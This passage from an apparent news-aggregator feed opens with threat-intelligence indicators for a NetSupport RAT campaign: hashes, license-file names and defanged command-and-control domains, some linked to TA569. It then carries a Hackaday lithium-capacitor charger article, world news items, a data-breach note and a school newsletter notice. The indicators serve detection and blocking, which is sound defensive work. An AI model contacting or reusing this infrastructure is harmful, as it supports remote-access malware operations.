67677c815070ca2e3ebd57a6adb58d2e

Nsm.lic
17a78f50e32679f228c43823faabedfd — DERTERT
b9956282a0fed076ed083892e498ac69 — DCVTTTUUEEW23
1b41e64c60ca9dfadeb063cd822ab089 — HANEYMANEY

NetSupport RAT C2 centers for Horns&Hooves
xoomep1[.]com
xoomep2[.]com
labudanka1[.]com
labudanka2[.]com
gribidi1[.]com
gribidi2[.]com

C2 centers known to be linked to TA569
shetrn1[.]com
shetrn2[.]com


securelist.com/horns-n-hooves-…



Building Experience and Circuits for Lithium Capacitors



For the cautious, a good piece of advice is to always wait to buy a new product until after the first model year, whether it’s cars, consumer electronics or any other major purchase. This gives the manufacturer a year to iron out the kinks and get everything shipshape the second time around. But not everyone is willing to wait on new tech. [Berto] has been interested in lithium capacitors, a fairly new type of supercapacitor, and being unwilling to wait for support circuitry schematics to magically show up on the Internet, he set about making his own.

The circuit he’s building here is a solar charger for the super capacitor. Being a fairly small device there’s not a lot of current, voltage, or energy, but these are different enough from other types of energy storage devices that it was worth taking a close look and designing something custom. An HT7533 is used for voltage regulation with a Schottky diode preventing return current to the solar cell, and a DW01 circuit is used to make sure that the capacitor doesn’t overcharge.

While the DW01 is made specifically for lithium-ion batteries, [Berto] found that it was fairly suitable for this new type of capacitor as well. The capacitor itself is suited to many low-power embedded applications where a battery might add complexity. Capacitors like this can charge much more rapidly and behave generally more linearly than their chemical cousins, and they aren’t limited to small applications either. For example, this RC plane was converted to run on supercapacitors.


hackaday.com/2024/12/02/buildi…



Ethiopia: the Oromia government signs a peace agreement with the OLA

The article comes from the blog of @Davide Tommasin ዳቪድ and was reshared to the Lemmy community @Notizie dall'Italia e dal mondo

The Oromia regional government has announced the signing of a peace agreement with a splinter group, the Oromo Liberation Army (OLA), led by the former commander of the Zone



IRELAND. Sinn Féin retreats, the far right fails to break through


@Notizie dall'Italia e dal mondo
In the Irish general election, a result below expectations for the republicans of Sinn Féin, while the far right gains votes but does not break through
The article IRELAND. Sinn Féin retreats, the far right fails to break through comes from Pagine Esteri.



Ethiopia: 9 dead in an attack in the Oromia region

The article comes from the blog of @Davide Tommasin ዳቪድ and was reshared to the Lemmy community @Notizie dall'Italia e dal mondo

Residents of the Shirka district in Ethiopia's #Arsi zone reported the killing of at least nine people during an attack on Thursday. The victims included women and elderly people, with residents who



Data breach: AIAD


@Informatica (Italy e non Italy 😁)
AIAD is the Federation, a member of Confindustria, representing Italian companies in Aerospace, Defence and Security. Who is AIAD? From the AIAD portal we learn that the […]
The article Data breach: AIAD comes from Edoardo Limone.

The article comes from the blog of #Cybersecurity expert edoardolimone.com/2024/12/02/d…



Somalia: hundreds of elite Somali soldiers graduate from a training programme in Turkey

The article comes from the blog of @Davide Tommasin ዳቪድ and was reshared to the Lemmy community @Notizie dall'Italia e dal mondo

Hundreds of members of an elite Somali commando unit completed a training programme in Turkey on Friday,



#NotiziePerLaScuola
The new issue of the newsletter of the Ministry of Education and Merit is available.